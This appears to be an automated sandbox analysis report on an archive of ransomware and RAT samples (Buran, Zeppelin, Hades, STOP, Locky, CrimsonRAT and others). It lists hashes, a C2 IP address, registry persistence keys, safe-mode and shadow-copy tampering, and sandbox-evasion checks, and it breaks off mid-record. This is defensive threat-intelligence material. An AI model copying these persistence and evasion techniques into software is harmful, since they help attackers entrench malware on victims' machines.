Analysis
max time kernel: 199s
max time network: 212s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-10-2024 15:51

Static task: static1
Behavioral task: behavioral1
Sample: RNSM00426.7z
Resource: win10v2004-20241007-en
General
Target: RNSM00426.7z
Size: 17.3MB
MD5: 8cf2c7d415775b5196246520c2b59271
SHA1: 82ef631a57e81daf3bb2e417eab8da6430ad20dc
SHA256: 5eac949abc1ffef1ef1674274a591d10ba4007bd56162cc0c5bb43a99644506d
SHA512: cbd349f83deaaea2c0774e51eefc6863e3a0845f2e93b829c797e845c9852f5fd82922e7d6308322dd22b92d08cf9d4c166f6ee09eb04b024f85da7cbdba8ce1
SSDEEP: 393216:4Y+JuAQ92vSTTF6Bmbm6+f90VZ5WT1J0o5ji7XyB1lczJ:WJOwGoBymJfY5WT1J0ayqjcl
Malware Config
Extracted
  Family: crimsonrat
  172.245.87.12
Extracted
  Path: C:\Users\Admin\Desktop\HOW-TO-DECRYPT-4lrb9.txt
Extracted
  Path: C:\Program Files\7-Zip\Lang\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
  Family: buran
Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family, first identified in 2019.

Buran family

CrimsonRAT main payload 1 IoCs
resource | yara_rule
behavioral1/files/0x0007000000023cac-92.dat | family_crimsonrat

CrimsonRat
Crimson RAT is malware attributed to a Pakistan-linked threat actor.

Crimsonrat family

Detects Zeppelin payload 1 IoCs
resource | yara_rule
behavioral1/memory/4000-1705-0x0000000000400000-0x0000000005678000-memory.dmp | family_zeppelin

Hades Ransomware
Ransomware family attributed to the Evil Corp APT, first seen in late 2020.

Hades family

Hades payload 1 IoCs
resource | yara_rule
behavioral1/files/0x0007000000023cb5-551.dat | family_hades

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe" | Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe" | Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe

Modiloader family

Suspicious use of NtCreateProcessExOtherParentProcess 10 IoCs
description | pid | Process | procid_target
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145
PID 2004 created 436 | 2004 | taskmgr.exe | 145

VashSorena Golang binary 1 IoCs
resource | yara_rule
behavioral1/files/0x0007000000023caf-100.dat | family_vashsorena

VashSorena Ransomware
Ransomware family with multiple versions/spinoffs. Decryption of files is generally possible without paying the ransom.

Vashsorena family

Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.

Zeppelin family

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ModiLoader Second Stage 1 IoCs
resource | yara_rule
behavioral1/files/0x0007000000023cb3-133.dat | modiloader_stage2

Renames multiple (163) files with added filename extension
This suggests ransomware activity: encryption of all the files on the system.

Renames multiple (3452) files with added filename extension
This suggests ransomware activity: encryption of all the files on the system.

Boot or Logon Autostart Execution: Active Setup 2 TTPs 3 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe

Checks computer location settings 2 TTPs 5 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | SayCheese.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.

Executes dropped EXE 34 IoCs
pid | Process
2940 | HEUR-Trojan-Ransom.MSIL.Agent.gen-a6787985243f50e272c98fe15b21f461f892e8905bbc5ffd7018ca2694bc5079.exe
3112 | HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe
4432 | HEUR-Trojan-Ransom.MSIL.Foreign.gen-4c8e0459524380a9f00ffc58913f461c3e1d8737dd18252881f09e2d416e4f73.exe
1740 | HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
4888 | HEUR-Trojan-Ransom.Win32.Generic-ea0663308264d011ded742ebb145cea6be39193596654979bd5a9f16b380aea3.exe
2096 | HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe
2352 | HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe
1556 | Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe
2076 | Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe
4200 | Trojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exe
32 | Trojan-Ransom.Win32.Cryptor.edd-a39888f0df247072b57479e11d5536692035f10a8a2b18b5dd510a7d2fffcc3d.exe
1472 | Enhancement
5036 | Trojan-Ransom.Win32.Encoder.lqn-5fd1a714a3c72c00cc9cbcdf8f100c2e8e8e475354c8c582d1711e737c398423.exe
736 | SayCheese.exe
3672 | Trojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exe
436 | Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe
1164 | Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe
1672 | config.exe
4000 | Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe
4896 | y_installer.exe
1908 | UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
3516 | UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
4172 | UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
3040 | VHO-Trojan-Ransom.Win32.Encoder.gen-f246d574704530d9e191350c1d4ecf118e4cb5444e598c16351fd02acc3fe928.exe
4052 | y_installer.exe
6092 | HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe
2996 | lsass.exe
632 | Chromium Updater Module.exe
5556 | Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe
5432 | lsass.exe
3404 | lsass.exe
5964 | Fast.exe
1800 | Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe
Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power | Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys | Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc | Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager | Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys | Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc | Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe

Loads dropped DLL 17 IoCs
pid | Process
1740 | HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
1740 | HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe
1740 | HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe
1740 | HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe
1740 | HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe
2096 | HEUR-Trojan-Ransom.Win32.Makop.gen-9ddffccd20b4260116e889b979e21e772848a457cb6b17a2664a4ee12aa9199f.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
648 | HEUR-Trojan-Ransom.Win32.Encoder.gen-ce979ac72ae1a0e4c13109625c4eee0ad521ee72cf380642bcc8375739b82d29.exe
4172 | UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
4172 | UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
2004 | taskmgr.exe

Modifies file permissions 1 TTPs 2 IoCs
pid | Process
4244 | icacls.exe
5220 | icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application 2 TTPs 8 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0dda7230-3da2-4000-b101-6367093b30da\\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe\" --AutoStart" | HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\userini = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe" | Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ebae5ddd-6f41-43a7-af86-4b49c73c4f64\\HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe\" --AutoStart" | HEUR-Trojan-Ransom.Win32.Stop.gen-d466ef9698569363af4f08b64235817c7838c726c1faee300582aab3d90f5683.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start" | Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chromium Update Module = "C:\\Users\\Admin\\AppData\\Roaming\\Chromium Updater Module.exe" | Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fast = "\"C:\\Users\\Admin\\AppData\\Local\\Fast\\Fast.exe\" /delay 0" | HEUR-Trojan-Ransom.Win32.Blocker.gen-2cf41c6c7b120dca73fc1b0145406c190c5ea38edf5f349387a51184359e82e6.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\userini = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe" | Trojan-Ransom.Win32.Gimemo.cdqu-e633ebfa45af4939e7cdef26411dbc929554ce84c076cbd85ab4a19ec1f3abcd.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe = "C:\\Users\\Admin\\Desktop\\00426\\Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe" | Trojan-Ransom.Win32.Blocker.jzec-ed34ead6ec6c362e85707d8a4ce385f6a967e155242be57ee4ee7235759d9870.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops desktop.ini file(s) 36 IoCs
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\K: | lsass.exe
File opened (read-only) | \??\H: | lsass.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\D: | explorer.exe
File opened (read-only) | \??\U: | lsass.exe
File opened (read-only) | \??\S: | lsass.exe
File opened (read-only) | \??\R: | lsass.exe
File opened (read-only) | \??\G: | lsass.exe
File opened (read-only) | \??\X: | lsass.exe
File opened (read-only) | \??\M: | lsass.exe
File opened (read-only) | \??\I: | lsass.exe
File opened (read-only) | \??\E: | lsass.exe
File opened (read-only) | \??\L: | lsass.exe
File opened (read-only) | \??\Z: | lsass.exe
File opened (read-only) | \??\V: | lsass.exe
File opened (read-only) | \??\P: | lsass.exe
File opened (read-only) | \??\O: | lsass.exe
File opened (read-only) | \??\N: | lsass.exe
File opened (read-only) | \??\B: | lsass.exe
File opened (read-only) | \??\F: | explorer.exe
File opened (read-only) | \??\W: | lsass.exe
File opened (read-only) | \??\Q: | lsass.exe
File opened (read-only) | \??\J: | lsass.exe
File opened (read-only) | \??\Y: | lsass.exe
File opened (read-only) | \??\T: | lsass.exe
File opened (read-only) | \??\A: | lsass.exe
File opened (read-only) | \??\F: | explorer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
141 | iplogger.org
143 | iplogger.org

Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
64 | api.2ip.ua
117 | geoiptool.com
128 | api.2ip.ua
63 | api.2ip.ua

Drops file in System32 directory 44 IoCs
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid | Process
2008 | cmd.exe

Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 3112 set thread context of 5688 | 3112 | HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe | 198
PID 1164 set thread context of 5556 | 1164 | Trojan-Ransom.Win32.Locky.bim-fb0f5ff4760f6869a63fc6ed01d19241d83919b88f70343473cb6af014fa8954.exe | 220

Drops file in Program Files directory 64 IoCs
Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_NinjaCat.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48_altform-unplated.png lsass.exe -
Drops file in Windows directory 1 IoCs
description                   ioc                                                                                                                              Process
File opened for modification  C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\comctl32.dll  UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid   pid_target  Process       procid_target
2036  2940        WerFault.exe  111
3832  2096        WerFault.exe  118
2076  2352        WerFault.exe  119
1196  5964        WerFault.exe  242
-
System Location Discovery: System Language Discovery 1 TTPs 38 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
-
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023cb0-102.dat nsis_installer_1 behavioral1/files/0x0007000000023cb0-102.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description        ioc                                                                           Process
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0              Chromium Updater Module.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier   Chromium Updater Module.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
description        ioc                                                                  Process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                   msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe
-
Kills process with taskkill 3 IoCs
pid   Process
1724  taskkill.exe
3464  taskkill.exe
3076  taskkill.exe
-
description      ioc                                                                                                                                                                                                                        Process
Key created      \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\GPU                                                                                                                    SearchApp.exe
Set value (int)  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe = "11001"  Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe
Set value (int)  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fast.exe = "9999"                                                        Fast.exe
Set value (int)  \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Chromium Updater Module.exe = "11001"                                    Chromium Updater Module.exe
Key created      \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\GPU                                                                                                                    SearchApp.exe
-
Modifies registry class 64 IoCs
\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 
0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "German Phone Converter" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "MS-1031-110-WINMO-DNN" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HW" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech Recognition Engine - it-IT Embedded DNN v11.1" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "{2984A9DB-5689-43AD-877D-14999A15DD46}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\L1033" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SR fr-FR Lookup Lexicon" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\TTS\\fr-FR\\M1036Paul" SearchApp.exe Set value (str) 